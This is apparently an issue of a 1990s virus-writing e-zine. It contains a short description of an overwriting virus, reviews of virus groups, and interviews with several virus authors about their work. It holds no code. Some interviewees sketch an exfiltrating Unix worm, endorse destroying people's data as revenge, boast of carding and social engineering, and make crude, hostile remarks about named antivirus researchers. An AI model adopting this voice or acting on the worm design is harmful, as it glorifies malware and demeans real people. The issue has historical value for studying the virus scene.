About a 220 byte overwriter ;) of EXE files which F-Prot doesn't detect for unknown reasons. It has two activation routines, one graphical and one standard, which itself claims to have some self-modifying code along with some nifty TSR routine. Of course that routine is a damn liar. The first one will blow on the second of November any year from 1997 (RTM Worm day). The second one will 'go off' on a random basis. This virus wasn't meant to be a serious virus, simply a demo virus (haha) for the demo routine above. Furthermore, the text strings

"[LiveWire GFX] ""Hiya, Robert.. !"

are visible in trojanized files.

Side-effects the conversation way

This was supposed to be a short summary of what good side effects viruswriting might have. I can't exactly say what you consider to be a positive effect of something, but most stuff one thinks of is negative, which of course leads us to a position where it's hard to motivate viruswriting. This means that this is an important issue to deal with if some of your irl 'friends' all of a sudden start wondering why the fuck you're doing it and you'll have to defend your rights.

Well, you probably have thought about a few good reasons yourself, if you need reasons that is. I said I couldn't give any good reasons for viruswriting in the interview published above ;).. Hm, that is definitely simplifying it, but for a time it's a fun thing to do.

Fun? Is it fun to write something with evil intention? Is it fun to make a bomb?

Well, bombs are interesting, but please don't compare those things. When I said "fun", I meant "interesting". Yes, it is interesting to program things. It's interesting to develop code with a unique capability - to self-replicate. It's interesting to meet other people similar to yourself, and it's interesting and fun to see other people's solutions and learn from them. The coding itself is just a must to be accepted by the people I talk with.

But why viruses?

Well, do you find any other programs that have the same impact on users as viruses? It's fun to know much about something that not too many people know much about.

So.. it's all about having respect then?

No, it's not. I won't discuss this with most people, only with those who are concerned. Plus, I like having knowledge in case some smartass needs to be "taken care of", but since I dislike physical violence, I find my computer skills somewhat useful.

So, then you distribute your code to people you dislike?

No. I didn't say you did now did I?

Defence is easy. Just bore them to death and voila, you'll win. The conversation above *was* boring and due to that, I won't write any more on it. The conversation above wasn't about side effects at all. Gotcha. As stated somewhere, stay tuned and it will be presented. Not here though. Ha-Ha.

Scene-Zines.

Recently, I've seen a lot of zines/groups popping up while some have faded away. Well, some say the scene is dying but I think not. Only the "good old virus groups" are. Rabid is dead (hehe!), P/S is, NuKE is RIP, YAM, TridenT, DY, VG and so on are (not much news, most people don't even know about some of them ;)) but! there are 'always' new groups coming up, some of which are really good.. and yea.. Immortal Riot is still around and will be for quite some time.. Don't expect a fade out!

The funny thing about virus groups is that we do release a shitload of zines. A short summary of the scene zines might be in order here (If I've forgotten one or two.. that is only because I'm tired, but since I dislike sleeping... deal with it).

40hex

From what I heard, P/S died and won't put out any more 40hex issues. Well, most 40hex issues did include things one can still look at and learn from, so if you miss them, re-read and study an old one :).

VLAD

It's sad Qark and Quantum gave the entire virus thing up, but we'll see what Darkman (who has been outta it recently) can do with it. I miss them ;) seeing my name appear in the greetings of each issue (hehe!) and those games included. After Metabolis gave up VLAD they lost a little of their "personality". Qark was very good as an organiser; too bad (for us) he got tired of it and decided to drop the entire thing. Good luck in life, guys!

INSANE REALITY:

After our merge with Genesis we finally brought out an issue, and in my opinion a very interesting issue too. Besides the overall code quality (maybe too high for most), it included a lot of other good non-coding material. Thanks are due to Dark Fiber for doing a lot of work for us!

Also worth mentioning is that Sepultura and Rajaat put a lot of effort into doing it as well as possible. I heard people complained and gave us negative feedback, yet I can't understand why.

There isn't much news in IRG (that I know of anyway); issue #9 is under development and you can, if you consider yourself worthy, contribute to it. Expect to see a high quality issue!

29A

VLAD-style group from Spain(?) that I wish good luck in the future. Had some interesting things in issue #1, and we can always hope it remains stable and evolves.

Computa-Gangsta

Issue #1 isn't really worth bitching on here. But, it's a first issue and I won't bitch on newcomers. We allstarted somewhere...

STEALTH.

Does contain a lot of complex & interesting stuff. Better commented viruses would increase the "overall quality" though. From Russia with love :).

PLASMA

DC is gone. Might have formed another group called RSA. Can be interesting to see what Wild Workerand co. can do with his crew (RSA). (I know he wasn't "pres" but he should be).

SVL

Good luck guys! I surely will enjoy reading this zine! It's quality (besides this article!) people expect from you. Hope there will be an issue #2!

[ Actually, this zine is not SVL's; moreover, it is not a group mag at all. Additionally, we would like to stay an intergroup zine :) ]

NuKE

Has been dead for several years now, still there are some newbies on irc asking for VCL2. Don't do that, it's annoying as hell and you'll most likely be kicked or banned two seconds after you press enter. So read my lips: NuKE is dead!

iKX

Seems to be an interesting group, including b0z0 and guys. They did contribute to Insane Reality #8and Sailor Moon is an interesting virus.

Minotaurus

Dunno if the spelling is correct or not ;). They should though write their stuff in English if they're around (haven't seen much lately though).

So.. there's actually a shitload of groups out there producing code. Hang around long enough on irc #virus and you'll see them sometime.

Greets

There are so many people to greet really. I would like to thank everyone who has been there for me, on irc, on email and on the phone. Further greets go to anyone who won't take this contribution seriously. I promised to include something and I try to keep my promises. ok?

Thanks to all I ever have done a /msg to, and yea.. IRG guys.. keep it up!

Credits

The Unforgiven. - Main article writer.

Well, that's it (if not specified somewhere else).

Goodbye's and cya somewhere.. somehow.

Vlad.Au. Keep on emailing me.

Quotation & Poetry

Just read my mind and find the complete guide to insanity. Should be trivial if you belong to the Second Foundation. Personally I dunno what choice I would make. First, Second or Gaia.. Hm, tricky.

But.. who really want to make choices. That sucks. I just want it all :).

Future

I will continue hanging on irc, writing my stupid articles and just floating around being what I've been. Really, I'm so satisfied with what Sepultura has done for IRG, so consider him in control. If you found this article chaotic, you're right; that was the idea, if I might add that. For IRG, the future is as bright as always.

Happy Valentine and 1997.

The Unforgiven.

Interview with CoKe of VLAD

People, this interview is the only online interview in this issue. In all other cases I sent the ppl the questions and just waited for the reply. If this interview sounds rather strange, never mind, excuse it; I interviewed _CoKe_ at a very unhealthy time. If I remember, it was about 6.30 am when we started. And at such a time, every normal European programmer sleeps... For some 1 or two hours...

Coke, try to introduce yourself ....

Hehe.. Well, my handle is CoKe, comes from Coca Cola, not from cocaine.. :) It's my first and only handle. Good enough? :)

So, the next question, a really difficult one: When did you start to do somethin' with computerz?

Phew.. I was 10 or so when I got my first PC.. 8088 XT with Hercules graphics card... Since most of the games were CGA only, I started to code in BasicA and GwBasic to write my own games... :) That makes 13 years now.

The coder was born.... but, in my humble opinion, the gamez and virii 're kinda different, or am I not right?

Of course. But I wrote my first "virus" in QuickBasic 4.0 some years later... On execution it got the current EXE name from the command line, did a shell "dir >file.txt", opened that, and overwrote the EXEs in the current directory with a copy of itself.. heh

Soundz like a good start, but to go resident in a HLL is a really difficult task. So you had to switch to the right language - to assembler...

Yeah.. I was too limited in Basic, so after a while, I switched to C... And to make some small routines faster, I used a bit of assembler to speed things up...

So your destiny was to become an assembler xpert and viruz coder after all the switching ....

Yeah... I always found viruses quite fascinating.. Biological AND computer viruses.. So I grabbed some interrupt list (Not Ralphie's), TASM, and started writing a non-ow com infector.. That actually took me 2 weeks of non-stop (night) work.. Another week later, I wrote a remover for it, since my friends playing and copying everything from my system got all infected.. hehe

I know that situation. Non-ow com infectorz are a good start for a coder, but you didn't stop at this level of code, I know... And that nice story with the remover ... Didn't you think of launching some kind of AV biz?

My first EXE infector was months later.. I first had to get Internet.. There I found an IR mag, called up their HQ, and got in touch with The Unforgiven and Metal Militia.. So I got more and more info, and got into work for my first EXE infector.. :) At that time I sent all my sources to Metal Militia, to discuss them over.. He was an idol at that time.. I thought about becoming AV for a time, but quickly realized that the AV was a commercial thingy, and directed by a few ppl. So I dropped the idea again... Especially after I got in touch with qark.

Qark is (was?) a really very productive coder, and of course, VLAD member. And to code alone, without being in any group, is not such big fun....

Exactly.. From the IR HQ I polled NukeNet, and posted some mails there... One day I had an email from qark inviting me to visit #virus, which I did.. He immediately put me on the Bot (LamerBot)... I coded some more stuff, and I gave one of them to VLAD because I wanted to join.. The votes were in my favour... fortunately.. :) hehe.. The funny thing is that the virus I gave them was buggy... But that's an old VLAD tradition.. hehe

[... I always use to say "It is not actually a bug, but only some minor compatibility problem with hardware... :)" ...]

So you landed in VLAD. How was the feeling of being a member of such an elite bunch of geekz?

I was VERY surprised... Because I became a VLAD member some weeks after I applied for IR membership.. I got refused because I was a non-Swede (No kiddin').. That depressed me a lot.. :) Becoming a VLAD member was something I didn't even dare to dream about.. :) I remember the day when the votes were finished, and Metabolis said on #virus: "CoKe is now a VLAD member"... Guess that was one of my happiest days.. :)

And can you say what is the true reason for VLAD's death?

First of all VLAD is _NOT_ dead...

??? all the people 're saying "VLAD is dead and issue #7 was the goodbye issue"...

That's not correct. There will be a VLAD #8... 100%...

That means ....???

Well, it means there will be a VLAD #8... :)

And who is continuing the tradition?

Darkman, me and [XXX] heheh... Qark and Quantum left VLAD because they were in the biz for too long, I guess... They both did remarkable work, so I guess they earned that pause. :-)

Let's get back to the main topic, the viruses. What's your best virus, what's your most favourite virus ... And what virus, in your opinion, was somewhat innovative recently?

I like all my viruses, and have absolutely no favourites.. Each virus is a mirror of my knowledge at that time, so I like them all.. I think my most innovative is Obscurum, which is a COM/EXE stealth/res/poly that has got some neat tricks to hide..

And some really good viruses by other authorz?

I think the most impressive virus of all time is BIZATCH, not because it was done by a fellow VLAD member.. Bizatch kicked Bill's ass.. :)

I agree, but all the AV humbug about naming it Boza was really disgusting.

Yes. I still don't quite understand why that shit.. Probably some kinda revenge.. A really LOW level revenge..

BIZATCH has shown that W95 is a piece of shit, but actually, we all knew it for a long time. So now I would like to ask you about your planz for the future. As a coder and of cos also in general... new OSes, new viruses, new trendz ...

Yes.. I loved OS/2, but due to a lack of software, I almost HAD to switch to WIN95, just like thousands of other users... I hate Bill for that.. OS/2 was much better, and WIN95 only made it because of HUGE publicity work by Mickeysoft.. My future.. Oh my... I'll do more viruses, and we'll try to get VLAD up again.. :)

Microsoft, how can something be good if it is produced by someone with a small and not hard (e.g. dick :)... btw, we have here such a club - M$-haterz and ALT-F4 club.

I like that ALT-F4 club.. hehe, where can I join? :)

Would you like to contribute to the greetingz section and to the fuck you section?

Greetings to Qark, Metabolis, MMIR, TUIR, Blonde/IR and Skeeve. Fuck-thems go to: All the lame irc-warriors.. Oh yeah .. and greetings to Sokrates as well.. :)

Okay, wish you good luck and all the best in your work.

Thanks.. :) And don't forget.. VLAD is not dead... :) I'd be grateful if you could email your mag to me..

That was CoKe exclusively for *zine, thanx for the interview... and remember...

VLAD is still ALIVE!

Interview with Wild W0rker of RSA

Wild W0rker is one of the regulars on #virus. So I decided to ask him for an interview. Here I present the resulting textfile.

Can you introduce yourself?

I am Wild W0rker, Ukrainian virus writer and RSA member born in 1937 :). I have a girlfriend (but maybe she is my wife already, coz I don't know when this mag will be released :).

[ Wildie is a married man for some 2 or 3 weeks now :). Here you can see how lazy I am ... ]

What is RSA?

Ruthless Stealth Angels (RSA), that's a Ukrainian virus writing group. BTW we need good coders :), if you are a good coder and wanna be an RSA member, email me at [email protected] or [email protected]

Why did you choose the nick Wild W0rker?

Dunno :) I was drunk when I selected it :)

When and why did you start to be interested in computers?

I saw a computer for the first time 6 years ago at school. It was a Soviet computer and looked like a refrigerator :). I love refrigerators with products, that's why I love computers :) (joke :)

[ I know such a computerz :) ]

Your first contact with a virus ...

When I started working with computers, one virus formatted all my disks... That was my first contact with viruses :)

[ Hi boyz, who coded that Anti WW0 virus ? :) ]

What about your first virus?

Heh, I made it one year, it was a resident com infector. It was a shitty virus, you know what a first virus is :) and I rm'd it.

Virus as weapon (bunch of paranoid geeks like NSA, CIA, DIA, SIS are asked to skip this question and answer)

Well, if you have problems with some ppl you don't need to use a gun... You can infect their computers and destroy all information on them... maybe after that these ppl will use a gun for suicide :)

Your favourite virus and why

Hmm, I think Zhengxi is it, coz it can infect everything, has a good polymorphic engine and many other nice features :)

Your favourite antivirus program and why

AVP, coz it has good polymorphism detection, not bad speed, excellent virus descriptions. (and it can be fucked... look at 29A#1 :)

Vx coder you would like to meet personally and why

I'd like to meet all vx coders who can drink not only juice :)

AV people you would like to meet

I don't want to meet AV ppl.

AV name(s) making you puke :-P

no one :)

Are there any laws in your country against viruses and their authors?

Maybe that's funny, but I don't know :)

What do you think 'bout maniacs who want to bust and prosecute us, the vx coders, and would like to erase the vx scene?

they are idiots :)

Your plans 4 the future as a coder and in general...

Well, me and my friends (RSA members) will work on dos/win95 viruses and we are trying to make an undetectable virus...

Last but not least: can you point us to some interesting online resources on the internet?

www.ilf.net - that's a nice vx archive

[ unfortunately, shortly after the zine was released, the server of the Information Liberation Front went down and never reappeared. Another mysterious case of a disappearing server ... ]

So Wild W0rker, thanx for the interview. And keep writing viruses. And don't worry 'bout being married :-P

Interview with Sepultura of IRG

So, in line with this policy, I decided to interview one of the IRG leading personalities, Sepultura. Although I had some technical problems at the time [ Sep knows :) ], here is the interview. Enjoy it!

Can you introduce yourself?

I'm Sepultura, born 1979, from Australia. I'm a virus writer who is a member of IRG (Immortal Riot/Genesis) and do a lot of the organisation that goes into IRG's magazine Insane Reality. The only thing I like more than viruses is music (Sonic Youth, Front 242, Sepultura, and Beethoven are among my favourites). Actually I like copious amounts of buds and lsd more than viruses too.

When and why did you start to be interested in computers?

I was never interesting ;) (so stop reading this interview).

When I was 6 my mum bought us a Commodore 64. I learnt BASIC and by the time I was 7 I was very proud of this 'guess the number' game I made. I spent a few years playing with the C64, but as you can imagine I got quite bored with it soon. Then, when I was 12, some teacher let me muck around on the school's computers while the rest of my class was doing maths (since me and a friend already knew it.. in fact all of IRG have IQs over 200). Me and my friend made this game to test people's multiplication tables and stuff, but the school never used it, as it flashed random insults and was quite abusive to the user if you got the answer wrong. This re-kindled my interest in computers and I nagged my mother, who bought a 386dx in that same year. (This was the computer on which my virus writing started).

Your first contact with a virus ...

For some reason I can't explain, I became very interested in viruses (aged 13, 1992). I didn't have a modem and knew no coders, so I had no idea what I should do. I met some lame fuck who told me viruses were written in C.. so I learnt C and after learning C still had no idea what to do (I didn't even know what a virus really does.. I just knew it replicates). Then I got vsum and it seemed to describe what viruses did in some detail, but I had no idea what it meant (what the fuck is Interrupt 13h?? =)). Then I got F-Prot and somewhere in its documentation Fridrik Skulason mentioned any average Assembler coder could make a virus.. now I knew I shouldn't have learned C. Finally I got a book (this is late 1993) called 'Undocumented DOS' that told me about things like Interrupts, segments, file I/O, and MCBs. It also had example programs written in ASM. I learnt ASM by studying these programs and by playing around in DOS debug.

At this stage I was ready to write a virus. Between here and when I had first become interested in viruses I had never actually seen or had contact with a virus.

What about your first virus?

Well.. just after learning ASM (or DEBUG ASM more precisely) my friend got his machine infected with a virus called Slow (an encrypted 1721 byte Jerusalem variant). I didn't have an assembler or disassembler (I didn't even know you could get disassemblers) so I studied the virus in Debug. I decided it was very badly coded, and wanted to make some changes, but I didn't even know how to change the length of the virus (so I had to modify it *and* keep it at 1721 bytes). The result was a semi-polymorphic virus with text strings and an activation routine. That *could* be my first virus but it was only a hack.

I didn't write a virus for a while because I didn't have an assembler, but finally I decided to write it in Debug. This involved writing the entire virus in Debug's (A)ssemble mode, printing out the (D)isasm listing, looking for errors, re-doing it over and over again until it worked. The first virus I did was Sepultura Boot.A, which I spent an entire evening working on in Debug. Then some TSR .COM infector (I worked out how to go TSR by reading the docs of an AV program called Stealth Bomber). Then my friend got a modem and I begged him to find me an assembler, which he did, and then I was free to write viruses as much as I wanted.

You started as an independent coder, but after your massive support for Insane Reality #7 you landed in Immortal Riot. Tell us the whole story.

OK.. here comes more of my life story =)

Mid '95 I got a modem and a carded OzEmail account. This is when I was first introduced to the virus scene. I met some guy called Qark, from VLAD magazine (which I read after FTP'ing it with my school's inet account, to which I 'socially engineered' the password). He was a nice guy and when I told him I was a virus coder he asked to see some code, which I showed him and he ended up sticking it in VLAD#5. This is when I realised other people might actually care to see my code. So I coded more and gave it to The Unforgiven (TU from now on) for IR#7. It turns out I donated more than average and people were impressed. Late in December '95 I joined VLAD but this didn't last long. There was a new group called Genesis, but after leaving VLAD I didn't think I should ask for membership in it as it would look like I was group hopping. February/March 1996, and TU told me IR was now an open group and I could join, so I asked if I could, and I did. Then (perhaps cos I nag too much) TU let me do a lot of organisation, and I ended up organising IR#8. And that's the whole story.

Perspectives of polymorphism

Traditional polymorphism (with a static virus wrapped in a highly variable decryptor) is a dying concept in my opinion. With the advent of generic decryption, polymorphism is not really much of a threat to the scanners any more.

I think the future lies in the 'metamorphic' viruses. These are viruses that are not encrypted, but the code of the virus itself changes. These include viruses such as PLY, Win.Apparition, TMC, and Swap. If we imagine metamorphism in the future reaching a stage where the only thing two copies of the 'same' virus have in common is the algorithm (or what they actually do), this can pose some interesting problems. Lots of 'different' viruses use exactly the same algorithm, so if a virus that modifies its code comes out, is it just creating a new copy of the same virus, or a new virus? And really, detecting a virus just by looking for code to perform a certain algorithm is what is used for heuristic scanning today, so when detecting a truly metamorphic virus, you are likely to detect a lot of completely unrelated viruses - how can you identify such a virus?

[ TMC hex dump can be found in this issue of our zine :P The source 'll be released only after all the major AV vendors 'll detect it. IMHO, they should have their job as hard as possible for their money :))))) Ed. ]

Perspectives of stealth

Stealth is a problem. Stealth stops the user noticing the virus, but to do stealth, you must be able to identify the virus and find the necessary info in the virus body. This defeats the purpose of polymorphism. I think in the long run, good polymorphism is a better option. I don't like viruses that are too desperate to be 'stealthy' that they sacrifice compatibility, like DIR-2, Assasin, and No. of the Beast.

Virus as weapon (bunch of paranoid geeks like NSA, CIA, DIA, SIS 're asked to skip this question and answer)

The kind of viruses we deal with (80x86) are not much of a weapon in my opinion. But I think viruses could be used as a weapon. Imagine a multiplatform virus (perhaps a Unix Shell Script), that exploited many Unix (and Unix variants) security flaws, and spread over a TCP/IP network. This is very similar to what the Robert Morris internet worm did, but it would have to be updated for newer systems, and shouldn't replicate till the machine crashes. The virus could then perhaps act as a sniffer, monitoring Ethernet activity looking for logins/passwords to other systems, to continue its spread. Furthermore, the virus could even search through (for example) any file, looking for the phrase 'U.S. Intelligence', and if the phrase was found, compress the file and send it to some barely used public-FTP site or mail the file UUENCODED to some obscure USENET Newsgroup, for the creator of the virus to download. Lastly, the virus could use a public key encryption system (such as RSA) - the virus would contain the public key, and encrypt the stolen (and compressed) information with it, so that it could only be decrypted by the creator of the virus, and people would not realise these junk files on the FTP site or USENET group contain anything unusual. If this was done well, it could be quite an effective intelligence weapon. (And we at IRG have done it, that's why we know everything about everyone).

As an Australian dude, can you describe local virus scene?

The Australian virus scene is quite healthy. Lots of solo virus writers have come from Australia, such as the Gingerbread Man, as well as quite a few members of NuKE, IRG, VLAD, and the AIH. As far as the international virus scene goes, I think Australia is quite prominent in it (Slovakia, Taiwan, ex-USSR, and Australia have all extended 'virus technology' quite a bit). On a more local level, the virus scene in my state is reasonably healthy too. Two IRG members live in this state, as well as a few lesser known virus coders. There are also 5 BBSs that I know of in this state that carry virus-related file and/or mail areas.

The same stuff as previous but AV

As far as I know, Leprechaun Virus Buster, and Cybec's VET are the only two Australian AV programs. They both suck completely and are not even worth mentioning.

Your favourite virus and why

I don't have a single favourite virus. My favourite viruses include:

Tremor, Havoc, N8FALL: Neurobasher was cool, if you consider the time at which his viruses were written. It is almost like he made a list of all threats to viruses at the time, and then made viruses to address these threats, 1 by 1. For example, the heuristic scanners (which were just coming out when he was around) detected suspicious date stamps, so he started using size padding instead, and modified his entire set of full-stealth routines to accommodate the variable size. In my opinion he is the king of retro-viruses - his were really the first ones to make strategic attacks on the AV programs.

Level3, Onehalf: Vyvojar's viruses caused many problems for the AV as well. Lots of scanners still can't detect these two viruses reliably. TBAV is even stupid enough to claim you should clean Onehalf with FDISK /MBR ;). Level3's engine is very complex yet is very logically coded.

Natas: Priest's code is very clean and error free, which is sadly, something most virus writers (including myself) lack.

Phoenix, Commander Bomber, MtE: DAV's code is fucking crazy. Hardly anyone I know can even understand the structures used in his viruses (especially MtE and Bomber). He's also the 'number theory in viruses' king.

TPVO: The TPVO viruses are excellent, strategic, and very cleanly coded. So are Dark Slayer's engines. Dark Slayer is one of the best currently active virus coders in my opinion.

Level3 and DAME are both worth looking at just for their very sturdy and logical code.


[ Well, as for One_Half, check out its original source code in the mag. First time ever published stuff :-P Ed. ]

Your favourite antivirus program and why

AVP would probably be the best overall program (it has excellent known virus detection and cure, CRC checking, good heuristics, and good decryption).

F-Prot has good known virus detection/cure.

Dr Web and DS-AVTK have very good emulators. I do not know what methods ICE-NOD uses, but it is very good too.

Suspicious.. I barely consider this an anti-virus program, it's much more like a set of diagnostic tools. Apart from the fact that it doesn't have the best decryption, the reports its heuristic scanner SSC gives are very detailed. Often, when I receive a new virus sample, instead of analysing it manually, I just run SSC over it and read the result.

I use AVP, AVG, DS-AVTK, ICE-NOD, F-PROT, TBSCAN, DR WEB, and SUSPICIOUS to test my viruses.

Vx coder you would like to meet personally and why

Just because someone is a good coder, I would not want to meet them - having a technical discussion with them over the phone/IRC/mail is enough. I have met DV8 before (the guy who coded Mr Klunky) and he gave me beer, so I guess I wouldn't mind meeting him again. I also would like to meet any other virus writer that would give me beer. I'd like to meet basically all of IRG.

AV people you would like to meet

Stefan Kurtzhals, the coder of F/WIN and Suspicious is an excellent coder and has a lot of technical knowledge, but from the discussions I have had with him I think he's fucking crazy, so I wouldn't mind meeting him. Also, any AV person who will give me beer. Mikko Hypponen/Eugene Kaspersky and occasionally Alan Solomon seem to make amusing jokes (and like beer).

Sara Gordon/Vesselin Bontchev/Jim Bates, so I can spit in their eye (and steal their beer of course).

[ Sep loves beer :) , I can promise if I 'll ever meet him, he gets some beer from me ... But basically, he should fly to Europe .... As 4 Jim Bates ... He deserves much more than such a lenient treatment. We should try to use Magic Bullet (tm) ... Ed. ]

Are there in Oz some laws against viruses and their authors?

There are no laws against writing viruses as far as I know. Spreading them is a different story. Laws were made to be broken anyway.

What do you think 'bout maniacs who want to bust and prosecute us, the vx coders and would like to erase the vx scene?

I don't think about them. They don't matter, and they will never succeed. We can simply ignore them, and they will go away. (But others will come along to take their place, so we just keep ignoring the ignorant masses).

Your plans 4 the future as coder and in general

No idea. I'm currently looking at infection of the new executables (NE/LE/PE and LX) as well as metamorphic viruses. Besides viruses I like playing with cryptography and computer security in general.

Last but not least: can you point us to some interestin' online resources on the internet?

http://www.geocities.com/SiliconValley/Park/9595/ (IRG homepage)
http://www.ikx.org/ (Lots of Stuff)
http://www.cyberstation.net/~cicatrix (Lots of Stuff)
http://www.metro.ch/avpve (Virus Encyclopaedia)
http://www.virusbtn.com/ (Virus Bulletin)
ftp://ftp.informatik.uni-hamburg.de/pub (AV papers)
ftp://ftp.elf.stuba.sk/pub/pc (LOTS of AV Programs)

So thanks, Sep. It was very nice of you to spend some time with this interview.

Not a problem, good luck with *-Zine. (Was I supposed to answer that??)

[ Sure, what else ? :) Ed. ]


Interview with MrSandman of 29A

... known as Tarantino's film lover.

As I wanted to gain some interviews for this issue I started with Sep. But due to some problem with my mailer daemon, actually the first interview was this one. Lem'me introduce a dude from Spain, who stayed some time in Romania. I guess that the Romania episode was the reason why Mr. Sandman started to write viruses. Just for explanation: Romania borders on Bulgaria.... And Bulgaria.....

Can you introduce yourselves?

Well, we're just a group of friends who got to know each other on a BBS, started exchanging ideas and decided (me) to found a virus writing group and release a virus magazine. Most of us are studying a career at the university, others are in the military service, and the rest are studying at the school, very near to starting a career.

Your relationship to girls, beer and other lovely subjects

Hehe... well, my relationship with my girlfriend is ok, we even travelled to India and live (sometimes) together in a flat of mine... we've been going out for more than a year :)
About beer, I'm sorry, but I don't like it :) I don't like drinking, I only do it in very special circumstances. Other lovely subjects could be music, cinema, and, of course, computing and writing viruses. Anyway, I don't have much free time, as I have a lot of exams and a lot of unreplied BBS and Internet mail... I guess you know this situation :)

When and why did you start to be interested in computers?

I had my first experience with an 8088 bought by my brother, when I was only 6 or 7. I didn't have any adaption process or shit like that, I just liked computers since the first time I knew them. Anyway, I must say that my first love was my first Macintosh :)

Your first contact with virus ...

It was some time after buying my first Mac, with a virus called WDEF with which there were some infected applications my brother brought from his work. Anyway, it was also an AV contact, as I did a disinfection work with an application called ResEdit (the equivalent in Mac OS for the debug.exe of DOS) :)

Two years later, more or less, my PC got infected with the Traceback.3066 virus, and that's when I really got interested in viruses, albeit I could not do any 'serious' work until I got a modem and downloaded more virus stuff (especially virus magazines) from Spanish underground boards.

What about your first virus?

Heh... well, there were some projects. The first virus I coded was a 30-byte-more-or-less overwriting infector :) Later I wrote an appending non-resident COM infector, later I tried the EXE infection, SYS files, etc. And that's when I started combining different kinds of infections and inventing some new original stuff.
The boot/MBR thing came later, but that's something I never liked, dunno why... this is... I can write a boot/MBR infector in two minutes, but I don't like them at all; don't ask me the reason :)

How did u land in 29A staff?

Well, actually I never landed... it was the rest of the people who did it :) We all used to interchange ideas and material via a Spanish BBS called Dark Node; one day I realised that we had enough stuff to release a zine, and then I proposed it. Many people accepted, so we founded 29A and we started to work in order to release our first zine asap.

Anyway, in 29A there's no staff, there's just a boss who takes decisions according to the opinion of the rest of the members, but there are no 'range' differences between us.

Perspectives of polymorphism

Polymorphism has some advantages if we compare it with other viral techniques such as stealth, for instance. There's no unique routine which mutates viruses, it's something very personal, more personal even than a virus itself. So it depends on the imagination of a virus author to write a powerful-supercomplex poly engine... anyway, right now we must focus on the slow poly stuff, as it's the unique way to fuck AVers and make them worth the money they earn.

And this last thing depends on the point of view of each virus author; some of us bet on originality, other writers prefer to release their viruses and see how long they stay in the wild... so there's no unique answer.

Perspectives of stealth

Stealth is almost dead, it's the opposite thing to polymorphism. There are very few stealth techniques, as everybody uses the ones which already exist... they only vary a little if you mean full stealth, as it's something which takes a bit more of time.

They work, so everybody uses them; they're very simple, so it's very difficult to write something really original and special on them. Anyway, Super (new 29A member!) has something to say about this ;)

New systems (W95, NT, OS/2) and viruses ...

Since Bill Gates is the wealthiest man on the earth right now, we must assume that Windows (and I don't mean Windows95 or NT) is the future. Heh, anybody could make all the people think that a crock of shit is good, and even eat it... if he has the money Bill Gates has :)

Operating systems such as Linux, OS/2 and Mac OS are very good, but they will die soon as the number of dickheads increases every day. Of course, Windows95 won't be the definitive operating system... anyway, I think that it's a positive thing to spend our time trying to find out more stuff about PE infection under Windows95, as things won't change radically in a LOT of time.

Today I got a message about the first virus under Linux. What do you think about it?

Good news for the virus community, of course :) That's the second part of the future... 50% will be Windows-dickheaded users, and 50% will be Internet applications developers who will work under Linux/Unix with programming languages such as Java.

Anyway, Linux is still a very 'rough' operating system which evolves with very slow but firm steps into a definitive consistent alternative.

Virus as weapon (bunch of paranoid geeks like NSA, CIA, DIA, SIS 're asked to skip this question and answer)

It'd be very difficult to write such a virus (if you're expecting a good success ratio), cause it'd have to be a slow infector... but not so slow, cause it'd then leave more time for people to discover it. It'd be a good idea to copy itself into unusual places, either using the cavity infection method or the Pascal/C trick used by Zhengxi and Lucretia.

There would be many more doubts about this, such as, for instance, whether to be small (the virus) but with a stupid encryption, or to be around 10k long, but encrypted with five highly polymorphic complex engines.

As a Spanish dude, can you describe local virus scene?

There's no scene besides 29A in Spain... there are many underground boards, but almost all of them without any special relevance. The two most important underground BBSs in Spain are Dark Node and Edison's Temple. In both of them you can find a lot of virus writers, but most of them are members of 29A, or just write a common virus from time to time.

It seems that hacking/phreaking is more popular here. In fact, Edison's Temple is a hacking-oriented BBS, just ask Mr. White or Wintermute, two of the most important persons there.

The same stuff as previous but AV

Some time ago there was an antivirus called Skudo, written by a dood from Barcelona called Jordi Más. Anyway, it was designed for preventing against viruses, not for detecting/disinfecting them. As its author left Barcelona and now lives in France, we didn't know anything else about Skudo.

There are some other 'pure' AV packages, such as Artemis, Panda, Oyster, XScan, PC-Cillin, and so on, but they're just commercial shit (the typical ignorant dickheads who claim that their antivirus detects over 9000 viruses, you know...).

Your favourite virus and why

Errrhmm... never had anything clear on this. I think I'd choose Zhengxi as my favourite virus, as it's the most complex I've ever seen in my life, and there are still lots of unexplored (commented tho) things on it which can be used in other viruses.

It's original, it uses a very insidious infection way, it's the most difficult virus to detect/disassemble, and its poly engine is *awesome*.

Your favourite antivirus program and why

AVP, of course. It's the most professional (well, I'd even say it's the unique professional AV), very reliable, easy to use for lamers and very flexible for gurus, it's the one which detects/disinfects more viruses, and the unique AV which includes so necessary (and easy!) techniques such as disinfecting known viruses in memory. Its code analyzer is the best, and it's probably the most difficult AV to fool. Besides, I love AVPUtil and AVPRO, two utilities of its registered version :)

Vx coder you would like to meet personally and why

Dunno, this is probably the most difficult question. I think Qark, he's very funny, he's the virus writer I admire most, and I have a very good relationship with him; of course, I'd like to meet other people I admire a lot, such as Quantum, Stormbringer, Rajaat, Q the Misanthrope... who knows, there are a lot.

All the 29Aers usually meet in Spain two or three times a year, and we have a lot of fun, we even bring computers to our meetings, so we can execute/write viruses, and so on :) Of course, it would be very nice to do a European VX meeting, that would be da freak! ;)

AV people you would like to meet

I'd like to meet Kaspersky in order to discuss technical stuff... in order to do other things, I'd rather choose Patty Hoffman, for masturbating in her tits, Vesselin Bontchev, in order to suggest him a new haircut, and Frans Veldman, for waking him up.

Are there in Spain some laws against viruses and their authors?

There's just a law which forbids to modify/destruct any data, but there's nothing against writing self-reproducing code and/or releasing it, you're guilty only if you're the one who executes it intentionally.


What do you think 'bout maniacs who want to bust and prosecute us, the vx coders and would like to erase the vx scene?

I call that envy. They can't just understand that the word 'virus' doesn't imply 'destruction' necessarily, so they can't understand that many people enjoy themselves writing viruses, just as other people do when they paint pictures or watch TV. They'd probably like to know how to write viruses without having to use VCL, but their morality forbids them to have any kind of relationship or contact with people in the virus scene.

Your plans 4 the future as coder and in general

Just to release a lot of highly successful 29A issues and to have more time to spend on doing the thing I like most: writing viruses. Never mind if they work under DOS, Windows, Windows95 or GameBoy, it's just to feel again the sensation of having written something really original and interesting to the rest of the people.

Last but not least: can you point us to some interestin' online resources on the internet?

Well, I'm not very used to navigating through the Internet, but anyway I have some interesting addresses in my bookmarks...

http://www.wcivr.com
WCIVR (Falcon's and Poltergeist's, the largest virus collection on the web)

http://www.comp-craiova.ro/~mkm/virii.html
Greenline's homepage, full of pretty interesting links

http://www.cyberstation.net/~cicatrix
Cicatrix's homepage (check it out!)

http://www.onetinc.com/~roadkill
Roadkill's Café (by Jack the Ripper).

